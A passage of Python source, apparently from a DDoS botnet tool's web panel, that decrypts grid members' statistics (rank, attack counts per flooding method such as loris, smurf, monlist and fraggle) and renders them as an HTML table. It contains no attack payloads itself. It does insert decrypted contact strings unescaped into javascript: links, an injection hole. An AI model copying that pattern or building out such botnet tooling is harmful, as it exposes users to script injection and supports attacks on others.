  6260. grid_ranking = nodec_text
  6261. self.decryptedtext = "" # clean decryptedtext buffer
  6262. if grid_ranking == 1: #Rookie
  6263. grid_ranking = "<font color='white' size='4'>*</font>"
  6264. member_1 = member_1 + 1
  6265. elif grid_ranking == 2: # Mercenary
  6266. grid_ranking = "<font color='cyan' size='4'>**</font>"
  6267. member_2 = member_2 + 1
  6268. elif grid_ranking == 3: # Bandit
  6269. grid_ranking = "<font color='blueviolet' size='4'>***</font>"
  6270. member_3 = member_3 + 1
  6271. elif grid_ranking == 4: # UFOmmander!
  6272. grid_ranking = "<font color='blue' size='4'>****</font>"
  6273. member_4 = member_4 + 1
  6274. elif grid_ranking == 5: # UFOl33t!
  6275. grid_ranking = "<font color='red' size='4'>&#x25BC;</font>"
  6276. member_5 = member_5 + 1
  6277. else:
  6278. grid_ranking = nodec_text
  6279. grid_totalchargo = m[2] # total chargo
  6280. self.decrypt(grid_key, grid_totalchargo)
  6281. if self.decryptedtext:
  6282. grid_totalchargo = self.decryptedtext
  6283. else:
  6284. grid_totalchargo = nodec_text
  6285. self.decryptedtext = "" # clean decryptedtext buffer
  6286. try: # parse for int
  6287. grid_totalchargo = int(grid_totalchargo)
  6288. mothership_chargo = mothership_chargo + grid_totalchargo
  6289. except:
  6290. grid_totalchargo = nodec_text
  6291. grid_dorking = m[3] # dorking
  6292. self.decrypt(grid_key, grid_dorking)
  6293. if self.decryptedtext:
  6294. grid_dorking = self.decryptedtext
  6295. else:
  6296. grid_dorking = nodec_text
  6297. self.decryptedtext = "" # clean decryptedtext buffer
  6298. try: # parse for int
  6299. grid_dorking = int(grid_dorking)
  6300. mothership_dorking = mothership_dorking + grid_dorking
  6301. except:
  6302. grid_dorking = nodec_text
  6303. grid_transferred = m[4] # transferred
  6304. self.decrypt(grid_key, grid_transferred)
  6305. if self.decryptedtext:
  6306. grid_transferred = self.decryptedtext
  6307. else:
  6308. grid_transferred = nodec_text
  6309. self.decryptedtext = "" # clean decryptedtext buffer
  6310. try: # parse for int
  6311. grid_transferred = int(grid_transferred)
  6312. mothership_transferred = mothership_transferred + grid_transferred
  6313. except:
  6314. grid_transferred = nodec_text
  6315. grid_maxchargo = m[5] # maxchargo
  6316. self.decrypt(grid_key, grid_maxchargo)
  6317. if self.decryptedtext:
  6318. grid_maxchargo = self.decryptedtext
  6319. else:
  6320. grid_maxchargo = nodec_text
  6321. self.decryptedtext = "" # clean decryptedtext buffer
  6322. try: # parse for int
  6323. grid_maxchargo = int(grid_maxchargo)
  6324. mothership_maxchargo = mothership_maxchargo + grid_maxchargo
  6325. except:
  6326. grid_maxchargo = nodec_text
  6327. grid_missions = m[6] # missions
  6328. self.decrypt(grid_key, grid_missions)
  6329. if self.decryptedtext:
  6330. grid_missions = self.decryptedtext
  6331. else:
  6332. grid_missions = nodec_text
  6333. self.decryptedtext = "" # clean decryptedtext buffer
  6334. try: # parse for int
  6335. grid_missions = int(grid_missions)
  6336. mothership_missions = mothership_missions + grid_missions
  6337. except:
  6338. grid_missions = nodec_text
  6339. grid_attacks = m[7] # attacks
  6340. self.decrypt(grid_key, grid_attacks)
  6341. if self.decryptedtext:
  6342. grid_attacks = self.decryptedtext
  6343. else:
  6344. grid_attacks = nodec_text
  6345. self.decryptedtext = "" # clean decryptedtext buffer
  6346. try: # parse for int
  6347. grid_attacks = int(grid_attacks)
  6348. mothership_attacks = mothership_attacks + grid_attacks
  6349. except:
  6350. grid_attacks = nodec_text
  6351. grid_loic = m[8] # loic
  6352. self.decrypt(grid_key, grid_loic)
  6353. if self.decryptedtext:
  6354. grid_loic = self.decryptedtext
  6355. else:
  6356. grid_loic = nodec_text
  6357. self.decryptedtext = "" # clean decryptedtext buffer
  6358. try: # parse for int
  6359. grid_loic = int(grid_loic)
  6360. mothership_loic = mothership_loic + grid_loic
  6361. except:
  6362. grid_loic = nodec_text
  6363. if version > 17 or version == 17 or version == 16 or version == 15 or version == 12 or version == 11:
  6364. grid_loris = m[9] # loris
  6365. self.decrypt(grid_key, grid_loris)
  6366. if self.decryptedtext:
  6367. grid_loris = self.decryptedtext
  6368. else:
  6369. grid_loris = nodec_text
  6370. self.decryptedtext = "" # clean decryptedtext buffer
  6371. try: # parse for int
  6372. grid_loris = int(grid_loris)
  6373. mothership_loris = mothership_loris + grid_loris
  6374. except:
  6375. grid_loris = nodec_text
  6376. else:
  6377. grid_loris = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not loris present
  6378. self.decrypt(grid_key, grid_loris)
  6379. if self.decryptedtext:
  6380. grid_loris = self.decryptedtext
  6381. else:
  6382. grid_loris = nodec_text
  6383. self.decryptedtext = "" # clean decryptedtext buffer
  6384. try: # parse for int
  6385. grid_loris = int(grid_loris)
  6386. mothership_loris = mothership_loris + grid_loris
  6387. except:
  6388. grid_loris = nodec_text
  6389. if version > 17 or version == 17 or version == 16 or version == 15 or version == 12:
  6390. grid_ufosyn = m[10] # ufosyn
  6391. self.decrypt(grid_key, grid_ufosyn)
  6392. if self.decryptedtext:
  6393. grid_ufosyn = self.decryptedtext
  6394. else:
  6395. grid_ufosyn = nodec_text
  6396. self.decryptedtext = "" # clean decryptedtext buffer
  6397. try: # parse for int
  6398. grid_ufosyn = int(grid_ufosyn)
  6399. mothership_ufosyn = mothership_ufosyn + grid_ufosyn
  6400. except:
  6401. grid_ufosyn = nodec_text
  6402. else:
  6403. grid_ufosyn = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not ufosyn present
  6404. self.decrypt(grid_key, grid_ufosyn)
  6405. if self.decryptedtext:
  6406. grid_ufosyn = self.decryptedtext
  6407. else:
  6408. grid_ufosyn = nodec_text
  6409. self.decryptedtext = "" # clean decryptedtext buffer
  6410. try: # parse for int
  6411. grid_ufosyn = int(grid_ufosyn)
  6412. mothership_ufosyn = mothership_ufosyn + grid_ufosyn
  6413. except:
  6414. grid_ufosyn = nodec_text
  6415. if version > 17 or version == 17 or version == 16 or version == 15:
  6416. grid_spray = m[11] # spray
  6417. self.decrypt(grid_key, grid_spray)
  6418. if self.decryptedtext:
  6419. grid_spray = self.decryptedtext
  6420. else:
  6421. grid_spray = nodec_text
  6422. self.decryptedtext = "" # clean decryptedtext buffer
  6423. try: # parse for int
  6424. grid_spray = int(grid_spray)
  6425. mothership_spray = mothership_spray + grid_spray
  6426. except:
  6427. grid_spray = nodec_text
  6428. else:
  6429. grid_spray = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not spray present
  6430. self.decrypt(grid_key, grid_spray)
  6431. if self.decryptedtext:
  6432. grid_spray = self.decryptedtext
  6433. else:
  6434. grid_spray = nodec_text
  6435. self.decryptedtext = "" # clean decryptedtext buffer
  6436. try: # parse for int
  6437. grid_spray = int(grid_spray)
  6438. mothership_spray = mothership_spray + grid_spray
  6439. except:
  6440. grid_spray = nodec_text
  6441. if version > 17 or version == 17 or version == 16 or version == 15:
  6442. grid_smurf = m[12] # smurf
  6443. self.decrypt(grid_key, grid_smurf)
  6444. if self.decryptedtext:
  6445. grid_smurf = self.decryptedtext
  6446. else:
  6447. grid_smurf = nodec_text
  6448. self.decryptedtext = "" # clean decryptedtext buffer
  6449. try: # parse for int
  6450. grid_smurf = int(grid_smurf)
  6451. mothership_smurf = mothership_smurf + grid_smurf
  6452. except:
  6453. grid_smurf = nodec_text
  6454. else:
  6455. grid_smurf = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not smurf present
  6456. self.decrypt(grid_key, grid_smurf)
  6457. if self.decryptedtext:
  6458. grid_smurf = self.decryptedtext
  6459. else:
  6460. grid_smurf = nodec_text
  6461. self.decryptedtext = "" # clean decryptedtext buffer
  6462. try: # parse for int
  6463. grid_smurf = int(grid_smurf)
  6464. mothership_smurf = mothership_smurf + grid_smurf
  6465. except:
  6466. grid_smurf = nodec_text
  6467. if version > 17 or version == 17 or version == 16 or version == 15:
  6468. grid_xmas = m[13] # xmas
  6469. self.decrypt(grid_key, grid_xmas)
  6470. if self.decryptedtext:
  6471. grid_xmas = self.decryptedtext
  6472. else:
  6473. grid_xmas = nodec_text
  6474. self.decryptedtext = "" # clean decryptedtext buffer
  6475. try: # parse for int
  6476. grid_xmas = int(grid_xmas)
  6477. mothership_xmas = mothership_xmas + grid_xmas
  6478. except:
  6479. grid_xmas = nodec_text
  6480. else:
  6481. grid_xmas = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not xmas present
  6482. self.decrypt(grid_key, grid_xmas)
  6483. if self.decryptedtext:
  6484. grid_xmas = self.decryptedtext
  6485. else:
  6486. grid_xmas = nodec_text
  6487. self.decryptedtext = "" # clean decryptedtext buffer
  6488. try: # parse for int
  6489. grid_xmas = int(grid_xmas)
  6490. mothership_xmas = mothership_xmas + grid_xmas
  6491. except:
  6492. grid_xmas = nodec_text
  6493. if version > 17 or version == 17 or version == 16:
  6494. grid_nuke = m[14] # nuke
  6495. self.decrypt(grid_key, grid_nuke)
  6496. if self.decryptedtext:
  6497. grid_nuke = self.decryptedtext
  6498. else:
  6499. grid_nuke = nodec_text
  6500. self.decryptedtext = "" # clean decryptedtext buffer
  6501. try: # parse for int
  6502. grid_nuke = int(grid_nuke)
  6503. mothership_nuke = mothership_nuke + grid_nuke
  6504. except:
  6505. grid_nuke = nodec_text
  6506. else:
  6507. grid_nuke = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not nuke present
  6508. self.decrypt(grid_key, grid_nuke)
  6509. if self.decryptedtext:
  6510. grid_nuke = self.decryptedtext
  6511. else:
  6512. grid_nuke = nodec_text
  6513. self.decryptedtext = "" # clean decryptedtext buffer
  6514. try: # parse for int
  6515. grid_nuke = int(grid_nuke)
  6516. mothership_nuke = mothership_nuke + grid_nuke
  6517. except:
  6518. grid_nuke = nodec_text
  6519. if version > 17 or version == 17:
  6520. grid_tachyon = m[15] # tachyon
  6521. self.decrypt(grid_key, grid_tachyon)
  6522. if self.decryptedtext:
  6523. grid_tachyon = self.decryptedtext
  6524. else:
  6525. grid_tachyon = nodec_text
  6526. self.decryptedtext = "" # clean decryptedtext buffer
  6527. try: # parse for int
  6528. grid_tachyon = int(grid_tachyon)
  6529. mothership_tachyon = mothership_tachyon + grid_tachyon
  6530. except:
  6531. grid_tachyon = nodec_text
  6532. else:
  6533. grid_tachyon = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not tachyon present
  6534. self.decrypt(grid_key, grid_tachyon)
  6535. if self.decryptedtext:
  6536. grid_tachyon = self.decryptedtext
  6537. else:
  6538. grid_tachyon = nodec_text
  6539. self.decryptedtext = "" # clean decryptedtext buffer
  6540. try: # parse for int
  6541. grid_tachyon = int(grid_tachyon)
  6542. mothership_tachyon = mothership_tachyon + grid_tachyon
  6543. except:
  6544. grid_tachyon = nodec_text
  6545. if version > 17:
  6546. grid_monlist = m[16] # monlist
  6547. self.decrypt(grid_key, grid_monlist)
  6548. if self.decryptedtext:
  6549. grid_monlist = self.decryptedtext
  6550. else:
  6551. grid_monlist = nodec_text
  6552. self.decryptedtext = "" # clean decryptedtext buffer
  6553. try: # parse for int
  6554. grid_monlist = int(grid_monlist)
  6555. mothership_monlist = mothership_monlist + grid_monlist
  6556. except:
  6557. grid_monlist = nodec_text
  6558. grid_fraggle = m[17] # fraggle
  6559. self.decrypt(grid_key, grid_fraggle)
  6560. if self.decryptedtext:
  6561. grid_fraggle = self.decryptedtext
  6562. else:
  6563. grid_fraggle = nodec_text
  6564. self.decryptedtext = "" # clean decryptedtext buffer
  6565. try: # parse for int
  6566. grid_fraggle = int(grid_fraggle)
  6567. mothership_fraggle = mothership_fraggle + grid_fraggle
  6568. except:
  6569. grid_fraggle = nodec_text
  6570. grid_sniper = m[18] # sniper
  6571. self.decrypt(grid_key, grid_sniper)
  6572. if self.decryptedtext:
  6573. grid_sniper = self.decryptedtext
  6574. else:
  6575. grid_sniper = nodec_text
  6576. self.decryptedtext = "" # clean decryptedtext buffer
  6577. try: # parse for int
  6578. grid_sniper = int(grid_sniper)
  6579. mothership_sniper = mothership_sniper + grid_sniper
  6580. except:
  6581. grid_sniper = nodec_text
  6582. grid_ufoack = m[19] # ufoack
  6583. self.decrypt(grid_key, grid_ufoack)
  6584. if self.decryptedtext:
  6585. grid_ufoack = self.decryptedtext
  6586. else:
  6587. grid_ufoack = nodec_text
  6588. self.decryptedtext = "" # clean decryptedtext buffer
  6589. try: # parse for int
  6590. grid_ufoack = int(grid_ufoack)
  6591. mothership_ufoack = mothership_ufoack + grid_ufoack
  6592. except:
  6593. grid_ufoack = nodec_text
  6594. grid_uforst = m[20] # uforst
  6595. self.decrypt(grid_key, grid_uforst)
  6596. if self.decryptedtext:
  6597. grid_uforst = self.decryptedtext
  6598. else:
  6599. grid_uforst = nodec_text
  6600. self.decryptedtext = "" # clean decryptedtext buffer
  6601. try: # parse for int
  6602. grid_uforst = int(grid_uforst)
  6603. mothership_uforst = mothership_uforst + grid_uforst
  6604. except:
  6605. grid_uforst = nodec_text
  6606. grid_droper = m[21] # droper
  6607. self.decrypt(grid_key, grid_droper)
  6608. if self.decryptedtext:
  6609. grid_droper = self.decryptedtext
  6610. else:
  6611. grid_droper = nodec_text
  6612. self.decryptedtext = "" # clean decryptedtext buffer
  6613. try: # parse for int
  6614. grid_droper = int(grid_droper)
  6615. mothership_droper = mothership_droper + grid_droper
  6616. except:
  6617. grid_droper = nodec_text
  6618. grid_overlap = m[22] # overlap
  6619. self.decrypt(grid_key, grid_overlap)
  6620. if self.decryptedtext:
  6621. grid_overlap = self.decryptedtext
  6622. else:
  6623. grid_overlap = nodec_text
  6624. self.decryptedtext = "" # clean decryptedtext buffer
  6625. try: # parse for int
  6626. grid_overlap = int(grid_overlap)
  6627. mothership_overlap = mothership_overlap + grid_overlap
  6628. except:
  6629. grid_overlap = nodec_text
  6630. grid_pinger = m[23] # pinger
  6631. self.decrypt(grid_key, grid_pinger)
  6632. if self.decryptedtext:
  6633. grid_pinger = self.decryptedtext
  6634. else:
  6635. grid_pinger = nodec_text
  6636. self.decryptedtext = "" # clean decryptedtext buffer
  6637. try: # parse for int
  6638. grid_pinger = int(grid_pinger)
  6639. mothership_pinger = mothership_pinger + grid_pinger
  6640. except:
  6641. grid_pinger = nodec_text
  6642. grid_ufoudp = m[24] # ufoudp
  6643. self.decrypt(grid_key, grid_ufoudp)
  6644. if self.decryptedtext:
  6645. grid_ufoudp = self.decryptedtext
  6646. else:
  6647. grid_ufoudp = nodec_text
  6648. self.decryptedtext = "" # clean decryptedtext buffer
  6649. try: # parse for int
  6650. grid_ufoudp = int(grid_ufoudp)
  6651. mothership_ufoudp = mothership_ufoudp + grid_ufoudp
  6652. except:
  6653. grid_ufoudp = nodec_text
  6654. else:
  6655. grid_monlist = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not monlist present
  6656. self.decrypt(grid_key, grid_monlist)
  6657. if self.decryptedtext:
  6658. grid_monlist = self.decryptedtext
  6659. else:
  6660. grid_monlist = nodec_text
  6661. self.decryptedtext = "" # clean decryptedtext buffer
  6662. try: # parse for int
  6663. grid_monlist = int(grid_monlist)
  6664. mothership_monlist = mothership_monlist + grid_monlist
  6665. except:
  6666. grid_monlist = nodec_text
  6667. grid_fraggle = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not fraggle present
  6668. self.decrypt(grid_key, grid_fraggle)
  6669. if self.decryptedtext:
  6670. grid_fraggle = self.decryptedtext
  6671. else:
  6672. grid_fraggle = nodec_text
  6673. self.decryptedtext = "" # clean decryptedtext buffer
  6674. try: # parse for int
  6675. grid_fraggle = int(grid_fraggle)
  6676. mothership_fraggle = mothership_fraggle + grid_fraggle
  6677. except:
  6678. grid_fraggle = nodec_text
  6679. grid_sniper = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not sniper present
  6680. self.decrypt(grid_key, grid_sniper)
  6681. if self.decryptedtext:
  6682. grid_sniper = self.decryptedtext
  6683. else:
  6684. grid_sniper = nodec_text
  6685. self.decryptedtext = "" # clean decryptedtext buffer
  6686. try: # parse for int
  6687. grid_sniper = int(grid_sniper)
  6688. mothership_sniper = mothership_sniper + grid_sniper
  6689. except:
  6690. grid_sniper = nodec_text
  6691. grid_ufoack = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not ufoack present
  6692. self.decrypt(grid_key, grid_ufoack)
  6693. if self.decryptedtext:
  6694. grid_ufoack = self.decryptedtext
  6695. else:
  6696. grid_ufoack = nodec_text
  6697. self.decryptedtext = "" # clean decryptedtext buffer
  6698. try: # parse for int
  6699. grid_ufoack = int(grid_ufoack)
  6700. mothership_ufoack = mothership_ufoack + grid_ufoack
  6701. except:
  6702. grid_ufoack = nodec_text
  6703. grid_uforst = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not uforst present
  6704. self.decrypt(grid_key, grid_uforst)
  6705. if self.decryptedtext:
  6706. grid_uforst = self.decryptedtext
  6707. else:
  6708. grid_uforst = nodec_text
  6709. self.decryptedtext = "" # clean decryptedtext buffer
  6710. try: # parse for int
  6711. grid_uforst = int(grid_uforst)
  6712. mothership_uforst = mothership_uforst + grid_uforst
  6713. except:
  6714. grid_uforst = nodec_text
  6715. grid_droper = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not droper present
  6716. self.decrypt(grid_key, grid_droper)
  6717. if self.decryptedtext:
  6718. grid_droper = self.decryptedtext
  6719. else:
  6720. grid_droper = nodec_text
  6721. self.decryptedtext = "" # clean decryptedtext buffer
  6722. try: # parse for int
  6723. grid_droper = int(grid_droper)
  6724. mothership_droper = mothership_droper + grid_droper
  6725. except:
  6726. grid_droper = nodec_text
  6727. grid_overlap = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not overlap present
  6728. self.decrypt(grid_key, grid_overlap)
  6729. if self.decryptedtext:
  6730. grid_overlap = self.decryptedtext
  6731. else:
  6732. grid_overlap = nodec_text
  6733. self.decryptedtext = "" # clean decryptedtext buffer
  6734. try: # parse for int
  6735. grid_overlap = int(grid_overlap)
  6736. mothership_overlap = mothership_overlap + grid_overlap
  6737. except:
  6738. grid_overlap = nodec_text
  6739. grid_pinger = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not pinger present
  6740. self.decrypt(grid_key, grid_pinger)
  6741. if self.decryptedtext:
  6742. grid_pinger = self.decryptedtext
  6743. else:
  6744. grid_pinger = nodec_text
  6745. self.decryptedtext = "" # clean decryptedtext buffer
  6746. try: # parse for int
  6747. grid_pinger = int(grid_pinger)
  6748. mothership_pinger = mothership_pinger + grid_pinger
  6749. except:
  6750. grid_pinger = nodec_text
  6751. grid_ufoudp = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not ufoudp present
  6752. self.decrypt(grid_key, grid_ufoudp)
  6753. if self.decryptedtext:
  6754. grid_ufoudp = self.decryptedtext
  6755. else:
  6756. grid_ufoudp = nodec_text
  6757. self.decryptedtext = "" # clean decryptedtext buffer
  6758. try: # parse for int
  6759. grid_ufoudp = int(grid_ufoudp)
  6760. mothership_ufoudp = mothership_ufoudp + grid_ufoudp
  6761. except:
  6762. grid_ufoudp = nodec_text
  6763. if version == 26:
  6764. grid_contact = m[25] # contact
  6765. self.decrypt(grid_key, grid_contact)
  6766. if self.decryptedtext:
  6767. grid_contact = self.decryptedtext
  6768. else:
  6769. grid_contact = nodec_text
  6770. self.decryptedtext = "" # clean decryptedtext buffer
  6771. if len(grid_contact) > 120 or len(grid_contact) < 3: # m[25] = grid_contact (>str3<str120)
  6772. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6773. else:
  6774. try:
  6775. if " " in grid_contact: # m[25] = grid_contact
  6776. grid_contact = grid_contact.replace(" ","")
  6777. grid_contact = "<a href=javascript:alert('"+str(grid_contact)+"');>View</a>" # js contact view
  6778. except:
  6779. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6780. try:
  6781. grid_id = m[26] # id
  6782. except:
  6783. grid_id = '6666666666666666666666666666666666666' # fake id
  6784. elif version == 17:
  6785. grid_contact = m[16] # contact
  6786. self.decrypt(grid_key, grid_contact)
  6787. if self.decryptedtext:
  6788. grid_contact = self.decryptedtext
  6789. else:
  6790. grid_contact = nodec_text
  6791. self.decryptedtext = "" # clean decryptedtext buffer
  6792. grid_contact = str(grid_contact) # contact
  6793. if len(grid_contact) > 120 or len(grid_contact) < 3: # m[16] = grid_contact (>str3<str120)
  6794. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6795. else:
  6796. try:
  6797. if " " in grid_contact: # m[16] = grid_contact
  6798. grid_contact = grid_contact.replace(" ","")
  6799. grid_contact = "<a href=javascript:alert('"+str(grid_contact)+"');>View</a>" # js contact view
  6800. except:
  6801. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6802. try:
  6803. grid_id = m[17] # id
  6804. except:
  6805. grid_id = '6666666666666666666666666666666666666' # fake id
  6806. elif version == 16:
  6807. grid_contact = m[15] # contact
  6808. self.decrypt(grid_key, grid_contact)
  6809. if self.decryptedtext:
  6810. grid_contact = self.decryptedtext
  6811. else:
  6812. grid_contact = nodec_text
  6813. self.decryptedtext = "" # clean decryptedtext buffer
  6814. grid_contact = str(grid_contact) # contact
  6815. if len(grid_contact) > 120 or len(grid_contact) < 3: # m[15] = grid_contact (>str3<str120)
  6816. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6817. else:
  6818. try:
  6819. if " " in grid_contact: # m[15] = grid_contact
  6820. grid_contact = grid_contact.replace(" ","")
  6821. grid_contact = "<a href=javascript:alert('"+str(grid_contact)+"');>View</a>" # js contact view
  6822. except:
  6823. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6824. try:
  6825. grid_id = m[16] # id
  6826. except:
  6827. grid_id = '6666666666666666666666666666666666666' # fake id
  6828. elif version == 15:
  6829. grid_contact = m[14] # contact
  6830. self.decrypt(grid_key, grid_contact)
  6831. if self.decryptedtext:
  6832. grid_contact = self.decryptedtext
  6833. else:
  6834. grid_contact = nodec_text
  6835. self.decryptedtext = "" # clean decryptedtext buffer
  6836. grid_contact = str(grid_contact) # contact
  6837. if len(grid_contact) > 120 or len(grid_contact) < 3: # m[14] = grid_contact (>str3<str120)
  6838. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6839. else:
  6840. try:
  6841. if " " in grid_contact: # m[14] = grid_contact
  6842. grid_contact = grid_contact.replace(" ","")
  6843. grid_contact = "<a href=javascript:alert('"+str(grid_contact)+"');>View</a>" # js contact view
  6844. except:
  6845. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6846. try:
  6847. grid_id = m[15] # id
  6848. except:
  6849. grid_id = '6666666666666666666666666666666666666' # fake id
  6850. elif version == 12:
  6851. grid_contact = m[11] # contact
  6852. self.decrypt(grid_key, grid_contact)
  6853. if self.decryptedtext:
  6854. grid_contact = self.decryptedtext
  6855. else:
  6856. grid_contact = nodec_text
  6857. self.decryptedtext = "" # clean decryptedtext buffer
  6858. grid_contact = str(grid_contact) # contact
  6859. if len(grid_contact) > 120 or len(grid_contact) < 3: # m[11] = grid_contact (>str3<str120)
  6860. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6861. else:
  6862. try:
  6863. if " " in grid_contact: # m[11] = grid_contact
  6864. grid_contact = grid_contact.replace(" ","")
  6865. grid_contact = "<a href=javascript:alert('"+str(grid_contact)+"');>View</a>" # js contact view
  6866. except:
  6867. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6868. try:
  6869. grid_id = m[12] # id
  6870. except:
  6871. grid_id = '6666666666666666666666666666666666666' # fake id
  6872. elif version == 11:
  6873. grid_contact = m[10] # contact
  6874. self.decrypt(grid_key, grid_contact)
  6875. if self.decryptedtext:
  6876. grid_contact = self.decryptedtext
  6877. else:
  6878. grid_contact = nodec_text
  6879. self.decryptedtext = "" # clean decryptedtext buffer
  6880. grid_contact = str(grid_contact) # contact
  6881. if len(grid_contact) > 120 or len(grid_contact) < 3: # m[10] = grid_contact (>str3<str120)
  6882. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6883. else:
  6884. try:
  6885. if " " in grid_contact: # m[10] = grid_contact
  6886. grid_contact = grid_contact.replace(" ","")
  6887. grid_contact = "<a href=javascript:alert('"+str(grid_contact)+"');>View</a>" # js contact view
  6888. except:
  6889. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6890. try:
  6891. grid_id = m[11] # id
  6892. except:
  6893. grid_id = '6666666666666666666666666666666666666' # fake id
  6894. elif version == 10:
  6895. grid_contact = m[9] # contact
  6896. self.decrypt(grid_key, grid_contact)
  6897. if self.decryptedtext:
  6898. grid_contact = self.decryptedtext
  6899. else:
  6900. grid_contact = nodec_text
  6901. self.decryptedtext = "" # clean decryptedtext buffer
  6902. grid_contact = str(grid_contact) # contact
  6903. if len(grid_contact) > 120 or len(grid_contact) < 3: # m[9] = grid_contact (>str3<str120)
  6904. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6905. else:
  6906. try:
  6907. if " " in grid_contact: # m[9] = grid_contact
  6908. grid_contact = grid_contact.replace(" ","")
  6909. grid_contact = "<a href=javascript:alert('"+str(grid_contact)+"');>View</a>" # js contact view
  6910. except:
  6911. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6912. try:
  6913. grid_id = m[10] # id
  6914. except:
  6915. grid_id = '6666666666666666666666666666666666666' # fake id
  6916. else:
  6917. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>" # js error contact view
  6918. grid_id = '6666666666666666666666666666666666666' # fake id
  6919. try: # parsing for valid stream struct
  6920. grid_ranking = str(grid_ranking)
  6921. if grid_ranking == nodec_text: # hide any data when user is encrypted
  6922. grid_contact = "<a href=javascript:alert('UNKNOWN!');>View</a>"
  6923. grid_table += "<tr><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(nodec_text)+"</td><td align='center'>"+str(grid_contact)+"</td></tr>"
  6924. else:
  6925. grid_table += "<tr><td align='center'>"+str(grid_nickname)+"</td><td align='center'>"+str(grid_ranking)+"</td><td align='center'>"+str(grid_totalchargo)+"</td><td align='center'>"+str(grid_dorking)+"</td><td align='center'>"+str(grid_transferred)+"</td><td align='center'>"+str(grid_maxchargo)+"</td><td align='center'>"+str(grid_missions)+"</td><td align='center'>"+str(grid_attacks)+"</td><td align='center'>"+str(grid_loic)+"</td><td align='center'>"+str(grid_loris)+"</td><td align='center'>"+str(grid_ufosyn)+"</td><td align='center'>"+str(grid_spray)+"</td><td align='center'>"+str(grid_smurf)+"</td><td align='center'>"+str(grid_xmas)+"</td><td align='center'>"+str(grid_nuke)+"</td><td align='center'>"+str(grid_tachyon)+"</td><td align='center'>"+str(grid_monlist)+"</td><td align='center'>"+str(grid_fraggle)+"</td><td align='center'>"+str(grid_sniper)+"</td><td align='center'>"+str(grid_ufoack)+"</td><td align='center'>"+str(grid_uforst)+"</td><td align='center'>"+str(grid_droper)+"</td><td align='center'>"+str(grid_overlap)+"</td><td align='center'>"+str(grid_pinger)+"</td><td align='center'>"+str(grid_ufoudp)+"</td><td align='center'>"+str(grid_contact)+"</td></tr>"
  6926. except:
